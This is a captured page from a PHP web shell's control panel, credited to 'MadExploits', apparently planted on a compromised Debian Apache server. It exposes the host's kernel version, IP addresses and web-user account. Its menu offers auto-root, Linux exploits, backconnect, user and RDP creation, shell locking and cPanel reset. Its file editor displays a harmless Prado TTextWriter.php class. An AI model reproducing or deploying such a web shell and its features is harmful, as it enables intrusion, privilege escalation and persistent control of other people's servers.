Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.191.72.220
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
v2021 /
framework /
IO /
[ HOME SHELL ]
Name
Size
Permission
Action
TTarFileExtractor.php
18.59
KB
-rw-r--r--
TTextWriter.php
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TTextWriter.php
<?php /** * TTextWriter class file * * @author Qiang Xue <qiang.xue@gmail.com> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.IO */ /** * TTextWriter class. * * TTextWriter implements a memory-based text writer. * Content written by TTextWriter are stored in memory * and can be obtained by calling {@link flush()}. * * @author Qiang Xue <qiang.xue@gmail.com> * @package System.IO * @since 3.0 */ class TTextWriter extends TComponent implements ITextWriter { private $_str=''; /** * Flushes the content that has been written. * @return string the content being flushed */ public function flush() { $str=$this->_str; $this->_str=''; return $str; } /** * Writes a string. * @param string string to be written */ public function write($str) { $this->_str.=$str; } /** * Writers a string and terminates it with a newline. * @param string content to be written * @see write */ public function writeLine($str='') { $this->write($str."\n"); } }
Close